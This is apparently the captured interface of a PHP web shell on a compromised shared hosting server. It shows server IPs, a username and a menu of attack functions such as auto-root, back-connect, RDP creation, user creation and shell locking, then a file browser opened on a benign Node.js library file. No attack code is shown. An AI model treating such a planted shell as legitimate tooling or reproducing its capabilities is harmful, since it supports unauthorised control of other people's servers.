Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tapable /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
AsyncParallelBailHook.js
2.12
KB
-rw-r--r--
AsyncParallelHook.js
721
B
-rw-r--r--
AsyncSeriesBailHook.js
851
B
-rw-r--r--
AsyncSeriesHook.js
711
B
-rw-r--r--
AsyncSeriesLoopHook.js
728
B
-rw-r--r--
AsyncSeriesWaterfallHook.js
1.06
KB
-rw-r--r--
Hook.js
4.29
KB
-rw-r--r--
HookCodeFactory.js
8.79
KB
-rw-r--r--
HookMap.js
995
B
-rw-r--r--
MultiHook.js
837
B
-rw-r--r--
SyncBailHook.js
922
B
-rw-r--r--
SyncHook.js
785
B
-rw-r--r--
SyncLoopHook.js
810
B
-rw-r--r--
SyncWaterfallHook.js
1.18
KB
-rw-r--r--
Tapable.js
1.91
KB
-rw-r--r--
index.js
790
B
-rw-r--r--
simpleAsyncCases.js
4.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MultiHook.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const Hook = require("./Hook"); class MultiHook { constructor(hooks) { this.hooks = hooks; } tap(options, fn) { for(const hook of this.hooks) { hook.tap(options, fn); } } tapAsync(options, fn) { for(const hook of this.hooks) { hook.tapAsync(options, fn); } } tapPromise(options, fn) { for(const hook of this.hooks) { hook.tapPromise(options, fn); } } isUsed() { for(const hook of this.hooks) { if(hook.isUsed()) return true; } return false; } intercept(interceptor) { for(const hook of this.hooks) { hook.intercept(interceptor); } } withOptions(options) { return new MultiHook(this.hooks.map(h => h.withOptions(options))); } } module.exports = MultiHook;
Close